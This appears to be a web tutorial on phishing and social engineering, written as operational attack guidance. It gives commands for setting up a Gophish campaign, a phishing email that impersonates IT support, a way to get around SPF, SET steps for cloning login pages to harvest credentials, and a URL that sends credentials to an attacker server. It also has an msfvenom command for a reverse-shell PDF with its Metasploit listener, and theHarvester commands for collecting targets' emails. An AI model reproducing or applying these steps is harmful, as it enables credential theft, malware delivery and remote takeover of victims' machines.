Introduction to Social Engineering
Social engineering is a technique that manipulates human behavior and emotions to gain access to sensitive information or prompt actions that compromise security, bypassing traditional technical defenses. Instead of exploiting system vulnerabilities, social engineering targets the natural tendencies of individuals, such as trust, curiosity, or fear, to deceive them into revealing confidential data or performing actions that benefit the attacker. This can take many forms, including phishing, where fraudulent emails are used to trick recipients into divulging passwords or clicking malicious links; website spoofing, where attackers create fake versions of trusted websites to steal login credentials; and impersonation, where attackers pose as legitimate entities or authority figures to gain trust and extract information. These tactics exploit the human element of security, which is often the weakest link, making social engineering one of the most effective and dangerous attack vectors in cybersecurity.
Online Social Engineering Techniques
Phishing
Phishing is an essential social engineering technique used to manipulate individuals into performing actions, such as clicking a malicious link or providing sensitive information. To perform a phishing campaign, you need to craft emails that appear legitimate, often imitating trusted entities like banks, online services, or government agencies. The goal is to deceive the target into clicking on a link or downloading an attachment, which leads to credential harvesting or malware installation.
Phishing campaigns can range from simple, generic messages to more targeted attacks, such as spear phishing, which personalizes the content based on information gathered about the victim. This makes the message more believable and increases the likelihood of success.
Phishing Tools and Setup
To perform a phishing campaign, a range of tools are available to design, execute, and track the success of the campaign. One of the most commonly used tools is Gophish, an open-source phishing framework that allows you to create, manage, and track phishing emails. Below are detailed steps and commands for setting up and executing a phishing campaign using Gophish and other tools.
Video Credit: DemmSec - GoPhish
Setting Up Gophish
To begin setting up a phishing campaign using Gophish, follow these steps:
Download Gophish:
wget https://github.com/gophish/gophish/releases/download/v0.11.0/gophish-v0.11.0-linux-64bit.zip
Unzip the file:
unzip gophish-v0.11.0-linux-64bit.zip
Navigate to the extracted folder:
cd gophish
Run Gophish:
./gophish
Once Gophish is running, access the Gophish dashboard by opening your browser and navigating to http://localhost:3333
. The default credentials are username: admin
and password: gophish
. From the dashboard, configure email templates, create campaigns, and track the success of the phishing attack.
Crafting Phishing Emails
To craft an effective phishing email, mimic a trusted entity by modifying the "From" address, subject line, and email body. Here’s an example email format that impersonates a trusted IT department:
From: IT Support <it-support@fakecompany.com> Subject: Important Account Update - Action Required Body: Please click the link below to verify your account information: <a href="http://maliciouslink.com">Verify Account</a>
Make sure to customize the content based on the organization or individual being targeted. For spear phishing campaigns, personalize the email by including information relevant to the target, such as their job role or recent activities, which can be gathered using OSINT tools.
Email Spoofing
Email spoofing is necessary to make the phishing email appear as if it is coming from a legitimate source. Use tools like King Phisher or manually forge email headers. To spoof the "From" field, configure email server settings or bypass security mechanisms such as SPF (Sender Policy Framework) validation.
Setting Up a Fake Login Page
After a phishing email is delivered, direct victims to a fake login page where they will enter their credentials. Use SET (Social Engineering Toolkit) to clone legitimate websites and set up phishing landing pages. Follow these steps to clone a website using SET:
Open the Social Engineering Toolkit (SET) in your terminal:
setoolkit
From the SET main menu, select the following options:
1) Social Engineering Attacks 2) Website Attack Vectors 3) Credential Harvester Attack Method 2) Site Cloner
When prompted, enter the URL of the website you wish to clone (e.g., https://example.com
):
Enter the URL to clone: https://example.com
SET will now create a fake login page based on the website you cloned. When a user inputs their credentials, they will be captured and logged for further use. Configure Gophish to direct users to this fake page by linking the malicious URL in the phishing email.
Tracking and Collecting Credentials
Once a victim clicks the link in the phishing email, they will be directed to the fake login page created by SET. To track user interactions and collect credentials, monitor the Gophish dashboard for engagement metrics such as clicks, submissions, and opened emails. For every credential submission, the data is logged and stored for future reference:
http://attacker-server.com/login?username=[USERNAME]&password=[PASSWORD]
Video Credit: Loi Liang Yang - Virus.PDF
Delivering Phishing Payloads
Phishing attacks often go beyond simple credential harvesting. In more advanced cases, the goal may be to deliver a malicious payload directly to the target’s machine. This can be done by embedding the payload in an email attachment, such as a PDF, or by providing a link to download a malicious file. The embedded payload, when executed, allows remote access to the victim’s machine or execution of other malicious actions.
To create a reverse shell payload and embed it into a PDF using Metasploit and msfvenom, use the following command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f pdf > malicious.pdf
This command generates a reverse TCP Meterpreter shell for Windows and embeds it in a PDF file. Replace attacker_ip
with your local IP address (the system that will receive the reverse shell) and LPORT=4444
with the port that will listen for the reverse connection.
Once the PDF is created, it can be attached to a phishing email, encouraging the target to download and open it under the guise of an important document. Upon opening, the payload inside the PDF is executed, creating a reverse shell connection back to the attacker’s machine.
To capture the reverse shell connection, set up a listener in Metasploit with the following commands:
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST attacker_ip set LPORT 4444 exploit
With this listener active, it will wait for the reverse shell connection. When the victim opens the malicious PDF, the connection is established, and you gain control of the target system using Meterpreter, where you can issue commands, upload/download files, and escalate privileges.
Spear Phishing with OSINT Tools
Spear phishing is more targeted and effective because it involves gathering detailed information about the victim before launching the attack. Use OSINT tools like theHarvester or Maltego to collect relevant information on the target, such as email addresses, phone numbers, social media profiles, and job roles. This data can be used to craft a more convincing phishing email, increasing the likelihood of the target interacting with it.
To gather email addresses from public sources, you can use theHarvester, a powerful OSINT tool that helps collect information such as emails, subdomains, IPs, and more from various public sources. For example, you can use theHarvester to search for email addresses associated with a specific domain:
theHarvester -d targetdomain.com -b google
In this command:
-d targetdomain.com
: Specifies the target domain you are investigating. Replacetargetdomain.com
with the actual domain you want to gather email addresses from.-b google
: Defines the source to query for the information. In this case,google
is the search engine being used, but you can also specify other sources such as Bing, LinkedIn, or others supported by theHarvester.
Once executed, theHarvester will search through the specified source (Google in this case) and return a list of email addresses, subdomains, and other information associated with the target domain. This data can be valuable for spear-phishing campaigns, further reconnaissance, or simply gathering contact information for a security audit.
You can also modify the command to search multiple sources at once or specify additional options for more advanced data collection:
theHarvester -d targetdomain.com -b google,bing,linkedin -l 500
In this command:
-b google,bing,linkedin
: Queries multiple sources, increasing the likelihood of finding relevant information.-l 500
: Limits the number of results from each source to 500, ensuring a broader data collection.
By using tools like theHarvester, you can automate the process of gathering publicly available information, which is especially useful in reconnaissance phases of cybersecurity assessments, penetration testing, or targeted attacks like spear-phishing.
Phishing campaigns are an effective way to gain unauthorized access to sensitive information. Tools like Gophish streamline the creation and execution of phishing emails, while SET and Metasploit can be used to clone websites and deliver malware payloads. Properly tracking engagement metrics and gathering credentials through Gophish ensures the success of the campaign. For more targeted attacks, spear phishing, supported by OSINT tools, makes the attack even more effective.